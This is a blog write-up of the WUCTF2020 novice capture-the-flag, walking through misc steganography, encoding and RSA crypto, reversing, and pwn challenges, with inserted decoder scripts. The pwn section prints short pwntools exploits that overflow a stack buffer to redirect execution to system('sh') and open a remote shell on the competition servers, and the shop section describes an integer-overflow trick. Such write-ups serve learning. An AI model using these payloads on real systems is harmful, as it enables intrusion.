Write-up of a Wuhan University of Science and Technology CTF novice competition (wuctf2020)

Over the past two days, I took part in a novice competition at Wuhan University of Science and Technology. Since I am a newbie, I can't solve any of the difficult challenges. Here are some of the simple ones.

Misc
1. Space Club
After opening the file, and going by the challenge title, I guessed it was probably a bunch of spaces or something similar, so I used Python to take a look:

with open("space.txt")as f:
    a=f.read()
    for i in a:
        print (str(ord(i)))

In the output, 32 is the ASCII code of the space, and 10 (the line feed) is presumably used as the separator. The differing number of spaces between separators is the useful information, so extract it next:

with open("space.txt")as f:
    a=f.read()
    g=0
    s=''
    for i in a:
        if ord(i)==32:
            g=g+1
        else:
            s+=chr(g+97)
            g=0
    print (s)

I initially thought the number of spaces would represent different letters, so this output is the number of spaces + 97. It turned out that the number of spaces between separators is always either 6 or 12. So replace g with 0 and m with 1, then convert the binary to ASCII to get the flag.
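
The whole decoding can be done in one pass. The following is an added example, not code from the original post; it assumes one run of spaces per line, 6 spaces for 0 and 12 for 1, and bits packed most significant bit first. The sample input is constructed, not the competition file.

```python
def decode_space_bits(text, zero=6, one=12):
    """Map each line's run of spaces to a bit, then pack the bits MSB-first into bytes."""
    bits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line == "":
            continue  # tolerate blank lines, e.g. after a trailing newline
        if line.strip(" ") != "":
            raise ValueError(f"line {lineno}: unexpected non-space character")
        if len(line) == zero:
            bits.append("0")
        elif len(line) == one:
            bits.append("1")
        else:
            raise ValueError(f"line {lineno}: {len(line)} spaces is neither {zero} nor {one}")
    if len(bits) % 8:
        raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
    groups = ("".join(bits[i:i + 8]) for i in range(0, len(bits), 8))
    return bytes(int(g, 2) for g in groups).decode("ascii")


def encode_space_bits(message, zero=6, one=12):
    """Build input in the same layout; used here only to construct the sample."""
    bits = "".join(format(b, "08b") for b in message.encode("ascii"))
    return "".join(" " * (one if bit == "1" else zero) + "\n" for bit in bits)


# Constructed sample, not the competition's space.txt.
SAMPLE = encode_space_bits("ctf{demo}")

if __name__ == "__main__":
    print(decode_space_bits(SAMPLE))
```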

2.
After the welcome exe is opened, the camera is turned on. Combining the "three persons" in the title with the hints in the description, I concluded that three people have to appear in front of the camera to get the flag. I won't upload the picture, so as not to expose my handsome face.

3.
The downloaded file has no extension. 010 Editor or WinHex shows from the file header that it is a PDF file. Change the extension and open it with a PDF editor or Photoshop. The hint says the flag is blocked by the picture, so select the picture and move it out of the way. After moving it away, a hexadecimal string is visible; convert it from hexadecimal to ASCII to get the flag.

4.
After downloading the girlfriend file, it turned out to be a WAV audio file. The sound seemed to be dial-tone steganography. I opened it with audio processing software and checked the spectrogram, which confirmed the guess. At first I tried reading the tones by eye, but there were too many and my eyes nearly went blind. The key problem is that it is easy to make mistakes, and my head just about exploded. Then I suddenly remembered that scripts exist for this, so I found one on GitHub, changed the file name in the script, ran it, and waited for the result:
999 666 88 2 777 33 6 999 4 444 777 555 333 777 444 33 66 3 7777
I happily submitted this bunch of digits, and of course it was wrong. Thinking about it carefully, a flag would not be this long; I was indeed naive. Thinking about it again, it felt like it should be related to the nine-key keypad: 999 represents the third character above the 9 key, y, and * is the separator. The solution is youaremygirlfriends. Obviously this must be the flag.
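
The keypad decoding above, as an added example that is not part of the original post. It assumes the standard phone layout (2 = abc ... 9 = wxyz) and accepts either spaces or * between groups; the function name is made up for this example.

```python
import re

# Standard phone keypad letters (assumed layout).
KEYPAD = {"2": "abc", "3": "def", "4": "ghi", "5": "jkl",
          "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz"}


def decode_multitap(text):
    """Decode multi-tap groups such as '999 666 88', separated by spaces or '*'."""
    out = []
    for group in re.split(r"[ *]+", text.strip(" *")):
        key = group[:1]
        # A group must be one key from 2-9 repeated, e.g. '777', never '779'.
        if key not in KEYPAD or group != key * len(group):
            raise ValueError(f"bad group {group!r}: expected one key 2-9 repeated")
        # More presses than the key has letters means the input was misread.
        if len(group) > len(KEYPAD[key]):
            raise ValueError(f"bad group {group!r}: key {key} has {len(KEYPAD[key])} letters")
        out.append(KEYPAD[key][len(group) - 1])
    return "".join(out)


# The digit groups quoted in the write-up.
PRESSES = "999 666 88 2 777 33 6 999 4 444 777 555 333 777 444 33 66 3 7777"

if __name__ == "__main__":
    print(decode_multitap(PRESSES))
```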

5.
The find me challenge is a JPG picture. After downloading it, I saw a bunch of strange text in its remarks field.
I didn't know what it was until I searched on Baidu. It can be decoded by pasting it into this website: https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen

6. shop
This one needs an nc connection to 47.97.40.187 12306.
After connecting, you find that you have 2020 money. A cheaper flag costs 999 with no limit on the quantity, while only one real flag can be bought.
We can buy a certain amount of cheaper flags for 100,000 and use integer overflow to realize the dream of becoming a billionaire. The number only needs to be a little larger than 2^31/999 + 2020/999. With this money, you can buy the real flag.
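
Why the threshold has the extra 2020/999 term, and the check that prevents the wrap, shown as an added example that is not code from the original post or the challenge. It assumes the shop keeps both the cost and the balance in signed 32-bit integers, which is what the formula in the text implies; all function names are made up for this example.

```python
INT32_MAX = 2**31 - 1


def to_int32(x):
    """Wrap a Python integer the way a signed 32-bit C int would."""
    x &= 0xFFFFFFFF
    return x - 2**32 if x > INT32_MAX else x


def buy_unchecked(balance, price, qty):
    """Assumed vulnerable logic: cost and new balance are both int32."""
    cost = to_int32(price * qty)          # wraps negative once price*qty >= 2^31
    if cost > balance:
        return balance, False             # "not enough money"
    return to_int32(balance - cost), True  # subtracting a negative cost adds money


def buy_checked(balance, price, qty):
    """Hardened logic: bound the quantity before any multiplication can wrap."""
    if qty <= 0 or qty > balance // price:
        return balance, False
    return balance - price * qty, True


def wrap_threshold_qty(balance, price):
    """Smallest quantity whose wrapped cost leaves a positive int32 balance.

    price*qty must exceed 2^31 + balance; below that the new balance
    itself overflows and comes out negative.
    """
    return (2**31 + balance) // price + 1


if __name__ == "__main__":
    q = wrap_threshold_qty(2020, 999)
    print(q, buy_unchecked(2020, 999, q), buy_checked(2020, 999, q))
```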

7. Alison likes jojo
The download contains two pictures. Run binwalk on the first one in a virtual machine; it can be split to yield an encrypted archive, whose password can be brute-forced in a second.
Inside the archive is a txt file. Decoding it three times with base64 gives "killerqueen". Because there is a second picture and there are no other files inside it, my preliminary guess was that the second picture had been processed by some software with killerqueen as the password. Decrypt it with outguess to get the flag.

Crypto

1. Calculation of large numbers
A calculator is enough for part3, part4 is an ordinary definite integral, for part2 I used Python, and for part1 I used a website to calculate.

2. B@se
This challenge makes changes to the base64 table; just map it back to the standard table and decode.

3. The Buddha said: It can only be four days
Anyone familiar with ciphers should recognize this encoding, but the slightly tricky part is that it uses the "new" Buddha's saying here. There is a new one?
http://hi.pcmoe.net/Buddha.html
After decoding, the result is the socialist core values encoding.
According to the hint, the next layer is the fence cipher: remove _doyouknowfence and continue decrypting.
By the same reasoning, I removed the ending of the result and continued with Caesar, but after going through a full round of shifts I didn't find anything, so I guessed that Caesar was not the last layer.
Then I observed that the string consists of capital letters and the digits 2-7, which made me think of base32. The flag in this competition begins with wctf2020, so I encoded that with base32 and found that the result starts with 'O'. I then looked for the string starting with O among the Caesar decryptions. Its beginning was exactly the same, which showed the guess was correct. Decode that string with base32 to get the flag.
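
The last step, picking the right Caesar shift by comparing against the base32 encoding of the known flag prefix, can be automated. This is an added example, not code from the original post; the ciphertext is a constructed sample and the function names are made up for this example.

```python
import base64
import string


def caesar(text, shift):
    """Shift A-Z only; digits and '=' padding are left unchanged."""
    out = []
    for ch in text:
        if ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def find_base32_layer(ciphertext, known_prefix=b"wctf2020"):
    """Try all 26 shifts and keep the one whose output starts like base32(known_prefix)."""
    # Only the base32 characters made entirely of prefix bits are predictable.
    stable = len(known_prefix) * 8 // 5
    want = base64.b32encode(known_prefix).decode()[:stable]
    for shift in range(26):
        cand = caesar(ciphertext, shift)
        if cand.startswith(want):
            padded = cand + "=" * (-len(cand) % 8)
            return shift, base64.b32decode(padded)
    return None


# Constructed sample: base32 of a made-up flag, then Caesar-shifted by 7.
SAMPLE_PLAIN = b"wctf2020{constructed_example}"
SAMPLE_CIPHER = caesar(base64.b32encode(SAMPLE_PLAIN).decode(), 7)

if __name__ == "__main__":
    print(find_base32_layer(SAMPLE_CIPHER))
```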

4. leak
This is an RSA challenge. The decryption script is as follows:

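import gmpy2
import binascii

def getd(n, e, dp):
    # e*dp = 1 (mod p-1), so e*dp - 1 = i*(p-1) for some 1 <= i < e
    t = dp * e - 1
    for i in range(1, e):
        if t % i == 0:
            p = t // i + 1  # candidate prime; // keeps this an exact integer
            if n % p == 0:
                q = n // p
                phi = (p - 1) * (q - 1)
                d = gmpy2.invert(e, phi)
                return d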
e = 65537
n = 156808343598578774957375696815188980682166740609302831099696492068246337198792510898818496239166339015207305102101431634283168544492984586566799996471150252382144148257236707247267506165670877506370253127695314163987084076462560095456635833650720606337852199362362120808707925913897956527780930423574343287847
dp = 734763139918837027274765680404546851353356952885439663987181004382601658386317353877499122276686150509151221546249750373865024485652349719427182780275825
c = 108542078809057774666748066235473292495343753790443966020636060807418393737258696352569345621488958094856305865603100885838672591764072157183336139243588435583104423268921439473113244493821692560960443688048994557463526099985303667243623711454841573922233051289561865599722004107134302070301237345400354257869
d = getd(n, e, dp)
m = pow(c, d, n)
h = format(int(m), 'x')
print(binascii.unhexlify('0' * (len(h) % 2) + h))  # pad to an even number of hex digits

Run it to get the flag.

Re
1. Cr0ssFun
Drag it into IDA.
It is actually a set of nested functions, like a matryoshka doll. In the end, the ASCII code of each character of the flag is given, and the flag can be obtained by joining them together.

2. level1
This challenge is a simple encryption. Understand the encryption method, then write the decryption script according to the given output.txt.

3. level2
After unpacking UPX, find the flag in the strings.

4. level3
For this challenge, I initially thought something was being done inside base64_encode. After analyzing it for a long time, I found out that the base64 table had been changed. After getting the new base64 table, I could decode the base64 string given in the code and get the flag.
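
Both this challenge and Crypto 2 (B@se) come down to decoding base64 with a replaced table. The following is an added example, not code from the original post; the table is a constructed one (the standard table with upper and lower case swapped), not the table from either challenge, and the function names are made up.

```python
import base64
import string

STD_TABLE = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def _check_table(table):
    if len(table) != 64 or len(set(table)) != 64 or "=" in table:
        raise ValueError("table must be 64 distinct characters without '='")


def decode_custom_b64(data, table):
    """Map each character back to the standard table, then decode normally."""
    _check_table(table)
    body = data.rstrip("=")
    bad = set(body) - set(table)
    if bad:
        raise ValueError(f"characters not in table: {sorted(bad)}")
    std = body.translate(str.maketrans(table, STD_TABLE))
    return base64.b64decode(std + "=" * (-len(std) % 4))


def encode_custom_b64(raw, table):
    """Inverse mapping; used here only to construct the sample."""
    _check_table(table)
    return base64.b64encode(raw).decode().translate(str.maketrans(STD_TABLE, table))


# Constructed table and sample, not taken from the challenges.
DEMO_TABLE = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+/"
DEMO_ENCODED = encode_custom_b64(b"ctf{demo}", DEMO_TABLE)

if __name__ == "__main__":
    print(DEMO_ENCODED, decode_custom_b64(DEMO_ENCODED, DEMO_TABLE))
```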

Pwn
1. getshell
Use a stack overflow to overwrite the return address with 0x08048524 and get the flag.

from pwn import *

sh=remote("47.97.40.187",12333)
payload=b'a'*0x18+b'bbbb'+p32(0x08048524)
sh.sendline(payload)
sh.interactive()

2. getshell2
Use the stack overflow to return to the address 0x08048529, which calls the system function; then find the address of the sh string and pass the sh string as the parameter to the system function.

from pwn import *

sh=remote("47.97.40.187",12334)
payload=b'a'*0x18+b'bbbb'+p32(0x08048529)+p32(0x08048670)
sh.sendline(payload)
sh.interactive()

3. number_game
After testing, the number -2^31-1 is enough.

from pwn import *

sh=remote("106.12.48.20",12336)
#payload=str(2147483648)
sh.sendline(str(-2147483649).encode())
sh.interactive()


Origin blog.csdn.net/weixin_45677731/article/details/105176874